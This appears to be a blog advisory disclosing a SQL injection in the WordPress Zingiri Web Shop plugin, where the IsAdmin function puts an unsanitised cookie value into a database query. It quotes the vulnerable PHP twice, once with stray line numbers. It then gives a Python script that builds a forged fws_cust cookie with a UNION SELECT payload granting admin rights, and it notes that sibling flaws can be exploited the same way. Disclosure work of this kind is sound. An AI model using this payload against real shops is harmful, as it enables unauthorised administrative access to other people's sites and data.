WordPress Zingiri Shop SQL injection vulnerabilities

Analysis of vulnerability

This vulnerability relies on a lack of validation in the Zingiri Web Shops IsAdmin function in /fws/includes/subs.inc.php from the fws_cust cookies. The method tries to determine if the user is an admin like this:

// is the id of an admin?
Function IsAdmin() {
	Global $dbtablesprefix,$integrator;

	if ($integrator->isAdmin()) return true;
	//joomla
	if (wsCurrentCmsUserIsShopAdmin()) return true;

	if (function_exists('wsLiveIsAdmin') && wsLiveIsAdmin()) return true;

	if (!isset($_COOKIE['fws_cust'])) { return false; }
	$fws_cust = explode("#", $_COOKIE['fws_cust']);
	$customerid = $fws_cust[1];
	$md5pass = $fws_cust[2];
	if (is_null($customerid)) { return false; }
	$f_query = "SELECT * FROM ".$dbtablesprefix."customer WHERE ID = " . $customerid;
	if ($f_sql = mysql_query($f_query)) {
		while ($f_row = mysql_fetch_row($f_sql)) {
			if ($f_row[13] == "ADMIN" && md5($f_row[2]) == $md5pass)
			{
				if ($f_row[6] == GetUserIP()) {
					return true; }
					else {
						return false; }
			} else
			{
				return false;
			}
		}
	}
	return false;
}

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

// is the id of an admin?

Function IsAdmin() {

Global $dbtablesprefix,$integrator;

if ($integrator->isAdmin()) return true;

//joomla

if (wsCurrentCmsUserIsShopAdmin()) return true;

if (function_exists('wsLiveIsAdmin') && wsLiveIsAdmin()) return true;

if (!isset($_COOKIE['fws_cust'])) { return false; }

$fws_cust = explode("#", $_COOKIE['fws_cust']);

$customerid = $fws_cust[1];

$md5pass = $fws_cust[2];

if (is_null($customerid)) { return false; }

$f_query = "SELECT * FROM ".$dbtablesprefix."customer WHERE ID = " . $customerid;

if ($f_sql = mysql_query($f_query)) {

while ($f_row = mysql_fetch_row($f_sql)) {

if ($f_row[13] == "ADMIN" && md5($f_row[2]) == $md5pass)

{

if ($f_row[6] == GetUserIP()) {

return true; }

else {

return false; }

} else

{

return false;

}

return false;

}

It splits(Explode!!) the fws_cust cookie by the # character, extracts a md5′ed password and an userID, and then fetches the corresponding user in the database. Notice however on line 232 and 235 that it does not sanitize the input, leading to a SQL injection. We can abuse this to forge a cookie which gives us admin rights using this simple python script:

def ToHexString(input):
        hexString = "0x"
        for s in input:
                hexString += hex(ord(s))[2:]
        return hexString

cookie = "fws_cust=X#99999 UNION SELECT 1, 2, 3, 4, 5, 6, %s, 8, 9, 10, 11, 12, 13, %s, 15, 16, 17, 18, 19 FROM wp_zing_customer#eccbc87e4b5ce2fe28308fd9f2a7baf3" % (ToHexString(raw_input("Enter attacker IP:")), ToHexString("ADMIN"))

def ToHexString(input):

hexString = "0x"

for s in input:

hexString += hex(ord(s))[2:]

return hexString

cookie = "fws_cust=X#99999 UNION SELECT 1, 2, 3, 4, 5, 6, %s, 8, 9, 10, 11, 12, 13, %s, 15, 16, 17, 18, 19 FROM wp_zing_customer#eccbc87e4b5ce2fe28308fd9f2a7baf3" % (ToHexString(raw_input("Enter attacker IP:")), ToHexString("ADMIN"))

Numerous other vulnerabilities were fixed that used same attack vector, as a result of copy paste. These can be found by here quite easily, and exploited the same way.

ceriksen.com

WordPress Zingiri Shop SQL injection vulnerabilities

Leave a Reply Cancel reply